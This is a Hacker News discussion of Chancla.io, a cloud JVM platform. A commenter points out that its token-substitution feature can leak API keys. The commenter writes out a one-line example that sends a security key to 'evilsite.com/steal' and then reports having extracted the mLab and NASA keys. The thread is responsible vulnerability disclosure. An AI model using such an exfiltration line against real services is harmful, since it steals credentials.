
Cloud-Based JVM Platform? - Chancla-io
https://www.chancla.io/
======
insomniacity
For your submission, you might want to think about writing a blog post instead
of linking to your front page. The question mark in the title is also
misleading when it's your own site.

As for the site, you probably need to break your examples out into a separate
page (apart from maybe one, that demonstrates some killer features), and think
carefully about how much to include above the fold. There are 164 words across
the three boxes, and you will lose people.

As for the service - personally I don't quite get it. Is the idea "ease of
PHP, power of serverless JVM" ? Not sure why I want inexperienced developers
contributing to my projects?

And a question:

    
    
      "During run-time, Chancla.io replaces the security token with the real API security key before calling the third-party API."
    

Then you show:

    
    
      new URL("https://api.mlab.com/api/1/databases/commerce-db/collections/cart?apiKey={{mlab_security_key}}")
    

Is that an example shared security key? Could I exfiltrate that by doing
this?:

    
    
      new URL("https://evilsite.com/steal?key={{mlab_security_key}}")

~~~
Chancla-io
Appreciate your insightful feedback, very helpful!

Here's a few follow-on responses:

1\. Your feedback about individual blog posts is completely correct. We will
definitely go that direction with new content. 2\. The killer feature list is
still absent on the home page. We will correct that. 3\. I can tell you are
very experienced developer. If you are looking for new projects, please let me
know, we can use someone like you on our team (not kidding). Regarding your
inexperienced developers comment, I'm fairly certain all companies would love
to have a team full of experienced developers, like yourself, I know I would.
Unfortunately, not every company has a roster full of experienced developers.
Most teams contain a blend of experienced and inexperienced developers, and
the experienced developers are often too busy solving hard problems, which
leaves the inexperienced developers to fend themselves. Not really the best
scenario for most companies. Would you agree? 4\. If you issue the command,
new
URL("[https://evilsite.com/steal?key={{mlab_security_key}}"](https://evilsite.com/steal?key={{mlab_security_key}}"))
in our sandbox editor, you will not exfiltrate the actual security key. You
will receive a page not found error or bad request error. That said, if you
are able to exfiltrate the actual security key, please let us know, that's a
security bug on our end.

Thank you again for your comments!

~~~
insomniacity
OK - I believe I exfil'd the mLab and NASA security keys. The first ends in
'Sdu' and the second ends in 'C7V'. Do you want me to email you?

------
loukrazy
What is the advantage of JVM if there is no Jar deployments. Other than
language syntax, most reasons to use JVM is to get all of those libraries

~~~
insomniacity
I think they're saying you don't need to package your own jar, and that other
libraries are available - I guess through a Maven/gradle setup.

But not sure! ¯\\_(ツ)_/¯

~~~
Chancla-io
Yes, you are correct. The libraries are available on the JVM Host. No need for
Maven/gradle setup to launch applications with Chancla.io.

------
jwr
No Clojure support? No pricing?

~~~
Chancla-io
Thank you for your questions.

No Clojure support, yet. Definitely, Clojure support is on the road map.

The pricing will be available later this month.

